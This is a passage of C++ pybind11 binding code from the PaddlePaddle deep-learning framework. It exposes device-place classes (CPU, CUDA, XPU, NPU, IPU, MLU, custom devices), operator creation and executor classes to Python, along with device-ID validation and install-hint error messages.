PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use NPUPlace in CPU/GPU/XPU version, "
"Please recompile or reinstall Paddle with NPU support."));
#else
return new paddle::platform::NPUDeviceContext(place);
#endif
})
.def_static("create",
[](paddle::platform::CUDAPlace& place)
-> paddle::platform::DeviceContext* {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use CUDAPlace in CPU only version, "
"Please recompile or reinstall Paddle with CUDA support."));
#else
auto* context = new paddle::platform::CUDADeviceContext(place);
context->SetAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(place, context->stream())
.get());
context->SetHostAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(paddle::platform::CPUPlace())
.get());
context->SetZeroAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetZeroAllocator(place)
.get());
context->PartialInitWithAllocator();
return context;
#endif
})
.def_static("create",
[](paddle::platform::CUDAPinnedPlace& place)
-> paddle::platform::DeviceContext* {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use CUDAPinnedPlace in CPU only version, "
"Please recompile or reinstall Paddle with CUDA support."));
#else
return new paddle::platform::CUDAPinnedDeviceContext(place);
#endif
});;
// clang-format on
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
py::class_<platform::Communicator>(m, "Communicator").def(py::init<>());
#endif
m.def("get_all_device_type", []() {
std::vector<std::string> device_types;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
device_types = platform::DeviceManager::GetAllDeviceTypes();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_all_device_type because you have installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_all_device_type, please try to install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return device_types;
});
m.def("get_all_custom_device_type", []() {
std::vector<std::string> device_types;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
device_types = platform::DeviceManager::GetAllCustomDeviceTypes();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_all_custom_device_type because you have installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_all_custom_device_type, please try to "
"install CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return device_types;
});
m.def("get_available_device", [] {
std::vector<std::string> devices;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
devices = platform::DeviceManager::GetAllDeviceList();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_available_device because you have installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_available_device, please try to install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return devices;
});
m.def("get_available_custom_device", [] {
std::vector<std::string> devices;
#ifdef PADDLE_WITH_CUSTOM_DEVICE
devices = platform::DeviceManager::GetAllCustomDeviceList();
#else
LOG(WARNING) << string::Sprintf(
"Cannot use get_available_custom_device because you have "
"installed"
"CPU/GPU version PaddlePaddle.\n"
"If you want to use get_available_custom_device, please try to "
"install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n");
#endif
return devices;
});
py::class_<platform::CustomPlace>(m, "CustomPlace",
R"DOC(
CustomPlace is a descriptor of a device.
It represents a custom device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
fake_cpu_place = paddle.CustomPlace("FakeCPU", 0)
)DOC")
.def("__init__",
[](platform::CustomPlace &self, const std::string &device_type,
int dev_id) {
#ifdef PADDLE_WITH_CUSTOM_DEVICE
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid CustomPlace(%s, %d), device id must be 0 "
"or "
"positive integer",
device_type, dev_id);
std::exit(-1);
}
if (LIKELY(platform::DeviceManager::HasDeviceType(device_type) &&
platform::DeviceManager::IsCustom(device_type))) {
int dev_count = static_cast<int>(
platform::DeviceManager::GetDeviceCount(device_type));
if (UNLIKELY(dev_id >= dev_count)) {
if (dev_count == 0) {
LOG(ERROR) << "Cannot use " << device_type
<< " because there is no " << device_type
<< " detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid CustomPlace(%s, %d), dev_id must "
"inside "
"[0, %d), because %s "
"number on your machine is %d",
device_type, dev_id, dev_count, device_type, dev_count);
std::exit(-1);
}
}
new (&self) platform::CustomPlace(device_type, dev_id);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid CustomPlace(%s, %d), the device type is "
"not registered "
"as a custom device.",
device_type, dev_id);
std::exit(-1);
}
#else
LOG(ERROR) << string::Sprintf(
"Cannot use CustomDevice because you have installed CPU/GPU"
"version PaddlePaddle.\n"
"If you want to use CustomDevice, please try to install"
"CustomDevice version "
"PaddlePaddle by: pip install paddlepaddle-core\n"
"If you only have CPU, please change "
"CustomPlace(%s, %d) to be CPUPlace().\n",
device_type, dev_id);
std::exit(-1);
#endif
})
.def("get_device_id",
[](const platform::CustomPlace &self) { return self.GetDeviceId(); })
.def("get_device_type",
[](const platform::CustomPlace &self) {
return self.GetDeviceType();
})
.def("__repr__", string::to_string<const platform::CustomPlace &>)
.def("__str__", string::to_string<const platform::CustomPlace &>);
py::class_<platform::CUDAPlace> cudaplace(m, "CUDAPlace", R"DOC(
CUDAPlace is a descriptor of a device.
It represents a GPU device allocated or to be allocated with Tensor or LoDTensor.
Each CUDAPlace has a dev_id to indicate the graphics card ID represented by the current CUDAPlace,
staring from 0.
The memory of CUDAPlace with different dev_id is not accessible.
Numbering here refers to the logical ID of the visible graphics card, not the actual ID of the graphics card.
You can set visible GPU devices by setting the `CUDA_VISIBLE_DEVICES` environment variable.
When the program starts, visible GPU devices will be numbered from 0.
If `CUDA_VISIBLE_DEVICES` is not set, all devices are visible by default,
and the logical ID is the same as the actual ID.
Parameters:
id (int): GPU device ID.
Examples:
.. code-block:: python
import paddle
place = paddle.CUDAPlace(0)
)DOC");
g_cudaplace_pytype = reinterpret_cast<PyTypeObject *>(cudaplace.ptr());
cudaplace
.def("__init__",
[](platform::CUDAPlace &self, int dev_id) {
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid CUDAPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetGPUDeviceCount())) {
if (platform::GetGPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use GPU because there is no GPU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid CUDAPlace(%d), must inside [0, %d), because GPU "
"number on your machine is %d",
dev_id, platform::GetGPUDeviceCount(),
platform::GetGPUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::CUDAPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use GPU because you have installed CPU version "
"PaddlePaddle.\n"
"If you want to use GPU, please try to install GPU version "
"PaddlePaddle by: pip install paddlepaddle-gpu\n"
"If you only have CPU, please change CUDAPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
.def("get_device_id",
[](const platform::CUDAPlace &self) { return self.GetDeviceId(); })
.def("_type", &PlaceIndex<platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPlace, platform::MLUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPlace, platform::CUDAPinnedPlace>)
.def("_get_device_id",
[](platform::CUDAPlace &self) -> int { return self.GetDeviceId(); })
#endif
.def("__repr__", string::to_string<const platform::CUDAPlace &>)
.def("__str__", string::to_string<const platform::CUDAPlace &>);
py::class_<platform::XPUPlace> xpuplace(m, "XPUPlace", R"DOC(
**Note**:
Examples:
.. code-block:: python
import paddle.fluid as fluid
xpu_place = fluid.XPUPlace(0)
)DOC");
g_xpuplace_pytype = reinterpret_cast<PyTypeObject *>(xpuplace.ptr());
xpuplace
.def("__init__",
[](platform::XPUPlace &self, int dev_id) {
#ifdef PADDLE_WITH_XPU
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid XPUPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetXPUDeviceCount())) {
if (platform::GetXPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use XPU because there is no XPU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid XPUPlace(%d), must inside [0, %d), because XPU "
"number on your machine is %d",
dev_id, platform::GetXPUDeviceCount(),
platform::GetXPUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::XPUPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use XPU because you have installed CPU/GPU version "
"PaddlePaddle.\n"
"If you want to use XPU, please try to install XPU version "
"PaddlePaddle by: pip install paddlepaddle-xpu\n"
"If you only have CPU, please change XPUPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
#ifdef PADDLE_WITH_XPU
.def("_type", &PlaceIndex<platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::XPUPlace, platform::XPUPlace>)
.def("_equals",
&IsSamePlace<platform::XPUPlace, platform::CUDAPinnedPlace>)
.def("get_device_id",
[](const platform::XPUPlace &self) { return self.GetDeviceId(); })
#endif
.def("__repr__", string::to_string<const platform::XPUPlace &>)
.def("__str__", string::to_string<const platform::XPUPlace &>);
#ifdef PADDLE_WITH_XPU
py::enum_<phi::backends::xpu::XPUVersion>(m, "XPUVersion", py::arithmetic())
.value("XPU1", phi::backends::xpu::XPUVersion::XPU1)
.value("XPU2", phi::backends::xpu::XPUVersion::XPU2)
.export_values();
m.def("get_xpu_device_count", platform::GetXPUDeviceCount);
m.def("get_xpu_device_version",
[](int device_id) { return platform::get_xpu_version(device_id); });
m.def("get_xpu_device_op_support_types",
[](const std::string &op_name, phi::backends::xpu::XPUVersion version) {
return platform::get_xpu_op_support_type(op_name, version);
});
m.def("get_xpu_device_op_list", [](phi::backends::xpu::XPUVersion version) {
return platform::get_xpu_op_list(version);
});
m.def("is_float16_supported", [](const platform::XPUPlace &place) -> bool {
// XPUs with Compute Capability > xpu2 support float16 and bfloat16
return platform::get_xpu_version(place.device) >
phi::backends::xpu::XPUVersion::XPU1;
});
m.def("is_bfloat16_supported", [](const platform::XPUPlace &place) -> bool {
// XPUs with Compute Capability > xpu2 support float16 and bfloat16
return platform::get_xpu_version(place.device) >
phi::backends::xpu::XPUVersion::XPU1;
});
#endif
py::class_<paddle::platform::CPUPlace> cpuplace(m, "CPUPlace", R"DOC(
CPUPlace is a descriptor of a device.
It represents a CPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
cpu_place = paddle.CPUPlace()
)DOC");
g_cpuplace_pytype = reinterpret_cast<PyTypeObject *>(cpuplace.ptr());
cpuplace.def(py::init<>())
.def("_type", &PlaceIndex<platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::CPUPlace, platform::CPUPlace>)
.def("_equals",
&IsSamePlace<platform::CPUPlace, platform::CUDAPinnedPlace>)
.def("__repr__", string::to_string<const platform::CPUPlace &>)
.def("__str__", string::to_string<const platform::CPUPlace &>);
py::class_<paddle::platform::CUDAPinnedPlace> cudapinnedplace(
m, "CUDAPinnedPlace", R"DOC(
CUDAPinnedPlace is a descriptor of a device.
It refers to the page locked memory allocated by the CUDA function `cudaHostAlloc()` in the host memory.
The host operating system will not paging and exchanging the memory.
It can be accessed through direct memory access technology to speed up the copy of data between the host and GPU.
For more information on CUDA data transfer and `pinned memory`,
please refer to `official document <https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html#pinned-memory>`_ .
Examples:
.. code-block:: python
import paddle
place = paddle.CUDAPinnedPlace()
)DOC");
g_cudapinnedplace_pytype =
reinterpret_cast<PyTypeObject *>(cudapinnedplace.ptr());
cudapinnedplace
.def("__init__",
[](platform::CUDAPinnedPlace &self) {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
PADDLE_THROW(platform::errors::PermissionDenied(
"Cannot use CUDAPinnedPlace in CPU only version, "
"Please recompile or reinstall Paddle with CUDA support."));
#endif
new (&self) platform::CUDAPinnedPlace();
})
.def("_type", &PlaceIndex<platform::CUDAPinnedPlace>)
.def("_equals", &IsSamePlace<platform::CUDAPinnedPlace, platform::Place>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::CUDAPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::XPUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::NPUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::CPUPlace>)
.def("_equals",
&IsSamePlace<platform::CUDAPinnedPlace, platform::CUDAPinnedPlace>)
.def("__repr__", string::to_string<const platform::CUDAPinnedPlace &>)
.def("__str__", string::to_string<const platform::CUDAPinnedPlace &>);
// NPUPlace
py::class_<platform::NPUPlace> npuplace(m, "NPUPlace", R"DOC(
NPUPlace is a descriptor of a device.
It represents a NPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
npu_place = paddle.NPUPlace(0)
)DOC");
g_npuplace_pytype = reinterpret_cast<PyTypeObject *>(npuplace.ptr());
npuplace
.def("__init__",
[](platform::NPUPlace &self, int dev_id) {
#ifdef PADDLE_WITH_ASCEND_CL
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid NPUPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetNPUDeviceCount())) {
if (platform::GetNPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use NPU because there is no NPU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid NPUPlace(%d), must inside [0, %d), because NPU "
"number on your machine is %d",
dev_id, platform::GetNPUDeviceCount(),
platform::GetNPUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::NPUPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use NPU because you have installed CPU/GPU version "
"PaddlePaddle.\n"
"If you want to use NPU, please try to install NPU version "
"PaddlePaddle by: pip install paddlepaddle-npu\n"
"If you only have CPU, please change NPUPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
.def("_type", &PlaceIndex<platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::NPUPlace, platform::NPUPlace>)
.def("_equals",
&IsSamePlace<platform::NPUPlace, platform::CUDAPinnedPlace>)
.def("get_device_id",
[](const platform::NPUPlace &self) { return self.GetDeviceId(); })
.def("__str__", string::to_string<const platform::NPUPlace &>);
// IPUPlace
py::class_<platform::IPUPlace>(m, "IPUPlace", R"DOC(
IPUPlace is a descriptor of a device.
It represents a IPU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
# required: ipu
ipu_place = paddle.IPUPlace()
)DOC")
.def("__init__",
[](platform::IPUPlace &self) {
#ifdef PADDLE_WITH_IPU
if (platform::GetIPUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use IPU because there is no IPU "
"detected on your "
"machine.";
std::exit(-1);
}
// use ipu(0) to comile, while run with the number user configure
// in sharding and pipline.
new (&self) platform::IPUPlace(0);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use IPU because you didn't install IPU version "
"PaddlePaddle.\n"
"If you want to use IPU, please try to install IPU version "
"PaddlePaddle by: pip install paddlepaddle*\n"
"If you only have CPU, please change IPUPlace to be "
"CPUPlace().\n");
std::exit(-1);
#endif
})
.def("_type", &PlaceIndex<platform::IPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::IPUPlace, platform::IPUPlace>)
.def("_equals",
&IsSamePlace<platform::IPUPlace, platform::CUDAPinnedPlace>)
#ifdef PADDLE_WITH_IPU
.def("get_device_id",
[](const platform::IPUPlace &self) { return self.GetDeviceId(); })
#endif
.def("__str__", string::to_string<const platform::IPUPlace &>);
// MLUPlace
py::class_<platform::MLUPlace> mluplace(m, "MLUPlace", R"DOC(
MLUPlace is a descriptor of a device.
It represents a MLU device on which a tensor will be allocated and a model will run.
Examples:
.. code-block:: python
import paddle
# required: mlu
mlu_place = paddle.MLUPlace(0)
)DOC");
g_mluplace_pytype = reinterpret_cast<PyTypeObject *>(mluplace.ptr());
mluplace
.def("__init__",
[](platform::MLUPlace &self, int dev_id) {
#ifdef PADDLE_WITH_MLU
if (UNLIKELY(dev_id < 0)) {
LOG(ERROR) << string::Sprintf(
"Invalid MLUPlace(%d), device id must be 0 or "
"positive integer",
dev_id);
std::exit(-1);
}
if (UNLIKELY(dev_id >= platform::GetMLUDeviceCount())) {
if (platform::GetMLUDeviceCount() == 0) {
LOG(ERROR) << "Cannot use MLU because there is no MLU "
"detected on your "
"machine.";
std::exit(-1);
} else {
LOG(ERROR) << string::Sprintf(
"Invalid MLUPlace(%d), must inside [0, %d), because MLU "
"number on your machine is %d",
dev_id, platform::GetMLUDeviceCount(),
platform::GetMLUDeviceCount());
std::exit(-1);
}
}
new (&self) platform::MLUPlace(dev_id);
#else
LOG(ERROR) << string::Sprintf(
"Cannot use MLU because you have installed CPU/GPU/... "
"version "
"PaddlePaddle.\n"
"If you want to use MLU, please try to install MLU version "
"PaddlePaddle by: pip install paddlepaddle-mlu\n"
"If you only have CPU, please change MLUPlace(%d) to be "
"CPUPlace().\n",
dev_id);
std::exit(-1);
#endif
})
.def("_type", &PlaceIndex<platform::MLUPlace>)
#ifdef PADDLE_WITH_MLU
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::Place>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::IPUPlace>)
.def("_equals", &IsSamePlace<platform::MLUPlace, platform::MLUPlace>)
.def("_equals",
&IsSamePlace<platform::MLUPlace, platform::CUDAPinnedPlace>)
.def("get_device_id",
[](const platform::MLUPlace &self) { return self.GetDeviceId(); })
#endif
.def("__str__", string::to_string<const platform::MLUPlace &>);
py::class_<platform::Place> platformplace(m, "Place");
g_place_pytype = reinterpret_cast<PyTypeObject *>(platformplace.ptr());
platformplace.def(py::init<>())
.def("_type", &PlaceIndex<platform::Place>)
.def("_equals", &IsSamePlace<platform::Place, platform::Place>)
.def("_equals", &IsSamePlace<platform::Place, platform::CUDAPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::CPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::XPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::NPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::IPUPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::CUDAPinnedPlace>)
.def("_equals", &IsSamePlace<platform::Place, platform::MLUPlace>)
.def("is_gpu_place",
[](platform::Place &self) { return platform::is_gpu_place(self); })
.def("is_cpu_place",
[](platform::Place &self) { return platform::is_cpu_place(self); })
.def("is_xpu_place",
[](platform::Place &self) { return platform::is_xpu_place(self); })
.def("is_npu_place",
[](platform::Place &self) { return platform::is_npu_place(self); })
.def("is_ipu_place",
[](platform::Place &self) { return platform::is_ipu_place(self); })
.def("is_cuda_pinned_place",
[](platform::Place &self) {
return platform::is_cuda_pinned_place(self);
})
.def("is_mlu_place",
[](platform::Place &self) { return platform::is_mlu_place(self); })
.def(
"is_custom_place",
[](platform::Place &self) { return platform::is_custom_place(self); })
.def("gpu_device_id", [](platform::Place &self) { return self.device; })
.def("xpu_device_id", [](platform::Place &self) { return self.device; })
.def("npu_device_id", [](platform::Place &self) { return self.device; })
.def("ipu_device_id", [](platform::Place &self) { return self.device; })
.def("mlu_device_id", [](platform::Place &self) { return self.device; })
.def("custom_device_id",
[](platform::Place &self) { return self.device; })
.def("set_place", [](platform::Place &self,
const platform::Place &other) { self = other; })
.def("set_place",
[](platform::Place &self, const platform::CPUPlace &cpu_place) {
self = cpu_place;
})
.def("set_place",
[](platform::Place &self, const platform::XPUPlace &xpu_place) {
self = xpu_place;
})
.def("set_place",
[](platform::Place &self, const platform::CUDAPlace &gpu_place) {
self = gpu_place;
})
.def("set_place",
[](platform::Place &self,
const platform::CUDAPinnedPlace &cuda_pinned_place) {
self = cuda_pinned_place;
})
.def("set_place",
[](platform::Place &self, const platform::NPUPlace &npu_place) {
self = npu_place;
})
.def("set_place",
[](platform::Place &self, const platform::IPUPlace &ipu_place) {
self = ipu_place;
})
.def("set_place",
[](platform::Place &self, const platform::MLUPlace &mlu_place) {
self = mlu_place;
})
.def("set_place",
[](platform::Place &self, const platform::CustomPlace &plug_place) {
self = plug_place;
})
.def("__repr__", string::to_string<const platform::Place &>)
.def("__str__", string::to_string<const platform::Place &>);
py::class_<OperatorBase>(m, "Operator")
.def_static("create",
[](py::bytes protobin) {
proto::OpDesc desc;
PADDLE_ENFORCE_EQ(desc.ParsePartialFromString(protobin),
true,
platform::errors::InvalidArgument(
"Cannot parse user input to OpDesc"));
PADDLE_ENFORCE_EQ(desc.IsInitialized(), true,
platform::errors::InvalidArgument(
"The provided OpDesc is not "
"initialized, the reason is: %s",
desc.InitializationErrorString()));
return OpRegistry::CreateOp(desc);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::CPUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::XPUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::NPUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::CUDAPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::CUDAPinnedPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::MLUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("type",
[](const OperatorBase &op) -> std::string { return op.Type(); })
.def("outputs",
[](const OperatorBase &op)
-> std::map<std::string, std::vector<std::string>> {
return op.Outputs();
})
.def("output_vars",
[](const OperatorBase &op) { return op.OutputVars(true); })
.def("inputs", [](const OperatorBase &op) { return op.Inputs(); })
.def("input_vars", [](const OperatorBase &op) { return op.InputVars(); })
.def("__str__", &OperatorBase::DebugString)
.def("no_intermediate_outputs",
[](const OperatorBase &op) { return op.OutputVars(false); })
.def("support_gpu", &OperatorBase::SupportGPU);
py::class_<framework::ExecutorPrepareContext>(m, "ExecutorPrepareContext")
.def(py::init<const ProgramDesc &, size_t>());
py::class_<framework::TrainerBase, std::shared_ptr<framework::TrainerBase>>(
m, "TrainerBase")
.def("get_worker_scope",
[](TrainerBase &self, int thread_id) -> Scope * {
return self.GetWorkerScope(thread_id);
},
py::return_value_policy::reference)
.def("finalize", &TrainerBase::Finalize)
.def("ResetDataset", &TrainerBase::ResetDataset);
m.def("_get_eager_deletion_vars", &framework::GetEagerDeletionCleanVars);
py::class_<framework::Executor>(m, "Executor")
.def(py::init<const platform::Place &>())
.def("close", &Executor::Close)
.def("run_from_dataset", &Executor::RunFromDataset,
py::call_guard<py::gil_scoped_release>())
.def("release_trainer", &Executor::ReleaseTrainer,
py::call_guard<py::gil_scoped_release>())
.def("init_for_dataset",
[](Executor &self, const ProgramDesc &prog,
const std::string &trainer_desc, Scope *scope,
Dataset *dataset) -> std::shared_ptr<TrainerBase> {
pybind11::gil_scoped_release release;
return self.InitForDataset(prog, trainer_desc, scope, dataset);
})
.def("run_from_dataset",
[](Executor &self, std::shared_ptr<TrainerBase> trainer) {
pybind11::gil_scoped_release release;
self.RunFromDataset(trainer);
})
.def("run_prepared_ctx",
[](Executor &self, ExecutorPrepareContext *ctx, Scope *scope,
std::map<std::string, const LoDTensor *> *feed_targets,
std::map<std::string, FetchType *> *fetch_targets,
bool create_local_scope = true, bool create_vars = true,
const std::string &feed_holder_name = "feed",
const std::string &fetch_holder_name = "fetch") {
pybind11::gil_scoped_release release;
self.RunPreparedContext(ctx, scope, feed_targets, fetch_targets,
create_local_scope, create_vars,
feed_holder_name, fetch_holder_name);
})
.def("run_prepared_ctx",
[](Executor &self, ExecutorPrepareContext *ctx, Scope *scope,
bool create_local_scope = true, bool create_vars = true,
bool keep_kids = false) {
pybind11::gil_scoped_release release;
self.RunPreparedContext(ctx, scope, create_local_scope,
create_vars, keep_kids);
})
.def("prepare",
[](Executor &self, const ProgramDesc &program, int block_id,
const std::vector<std::string> &skip_ref_cnt_vars =
std::vector<std::string>(),
bool force_disable_gc = false) {
pybind11::gil_scoped_release release;
return self.Prepare(program, block_id, skip_ref_cnt_vars,
force_disable_gc);
})
.def("create_variables", &Executor::CreateVariables)
.def("run", [](Executor &self, const ProgramDesc &prog, Scope *scope,
int block_id, bool create_local_scope, bool create_vars,
const std::vector<std::string> &fetch_vars) {
pybind11::gil_scoped_release release;
self.Run(prog, scope, block_id, create_local_scope, create_vars,
fetch_vars);
});
py::class_<framework::interpreter::CostInfo>(m, "CostInfo")
.def(py::init<>())
.def("total_time",
[](interpreter::CostInfo &self) { return self.total_time; })
.def("device_memory_bytes", [](interpreter::CostInfo &self) {
return self.device_memory_bytes;
});
py::class_<framework::StandaloneExecutor>(m, "StandaloneExecutor")
.def(py::init<const platform::Place &, const ProgramDesc &,
const ProgramDesc &, Scope *>())
.def("run",
[](StandaloneExecutor &self,
const std::unordered_map<std::string, py::array> &input_dict,
std::vector<std::string> fetch_names) {
std::vector<framework::LoDTensor> feed_tensors;
std::vector<std::string> feed_names;
for (auto &item : input_dict) {
framework::LoDTensor t;
SetTensorFromPyArray<platform::CPUPlace>(
&t, item.second, platform::CPUPlace(), false);
feed_names.push_back(item.first);
feed_tensors.push_back(t);
}
paddle::framework::FetchList ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(feed_names, feed_tensors, fetch_names);
}
return py::cast(std::move(ret));
})
.def("run",
[](StandaloneExecutor &self,
const std::unordered_map<std::string, framework::LoDTensor>
&input_dict,
std::vector<std::string> fetch_names) {
std::vector<framework::LoDTensor> feed_tensors;
std::vector<std::string> feed_names;
for (auto &item : input_dict) {
feed_names.push_back(item.first);
feed_tensors.push_back(item.second);
}
paddle::framework::FetchList ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(feed_names, feed_tensors, fetch_names);
}
return py::cast(std::move(ret));
})
.def("run",
[](StandaloneExecutor &self, std::vector<std::string> feed_names,
std::vector<std::string> fetch_names) {
paddle::framework::FetchList ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(feed_names, fetch_names);
}
return py::cast(std::move(ret));
})
.def("dry_run",
[](StandaloneExecutor &self,
const std::unordered_map<std::string, py::array> &input_dict) {
std::vector<framework::LoDTensor> feed_tensors;
std::vector<std::string> feed_names;
for (auto &item : input_dict) {
framework::LoDTensor t;
SetTensorFromPyArray<platform::CPUPlace>(
&t, item.second, platform::CPUPlace(), false);
feed_names.push_back(item.first);
feed_tensors.push_back(t);
}
framework::interpreter::CostInfo cost_info;
{
pybind11::gil_scoped_release release;
cost_info = self.DryRun(feed_names, feed_tensors);
}
return cost_info;
});
m.def("init_gflags", framework::InitGflags);
m.def("init_glog", framework::InitGLOG);
m.def("load_op_meta_info_and_register_op",
framework::LoadOpMetaInfoAndRegisterOp);
m.def("init_devices", []() { framework::InitDevices(); });
m.def("is_compiled_with_cuda", IsCompiledWithCUDA);
m.def("is_compiled_with_ascend", IsCompiledWithAscend);
m.def("is_compiled_with_rocm", IsCompiledWithROCM);
